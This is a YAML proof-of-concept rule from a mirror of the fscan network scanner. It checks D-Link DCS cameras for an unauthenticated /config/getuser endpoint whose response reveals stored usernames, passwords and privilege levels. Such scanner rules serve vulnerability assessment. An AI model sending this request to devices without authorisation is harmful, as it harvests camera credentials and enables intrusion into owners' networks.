mirror of
https://github.com/shadow1ng/fscan.git
synced 2025-11-05 10:45:27 +00:00
9 lines
363 B
YAML
9 lines
363 B
YAML
|
|
name: poc-yaml-dlink-dcs-info-leak
|
||
|
|
rules:
|
||
|
|
- method: GET
|
||
|
|
path: /config/getuser?index=0
|
||
|
|
expression: response.status == 200 && response.body.bcontains(b"name=") && response.body.bcontains(b"pass=") && response.body.bcontains(b"priv=")
|
||
|
|
detail:
|
||
|
|
author: jingling(https://github.com/shmilylty)
|
||
|
|
links:
|
||
|
|
- https://mp.weixin.qq.com/s/cG868wc7dmwxFslcwlgDpw
|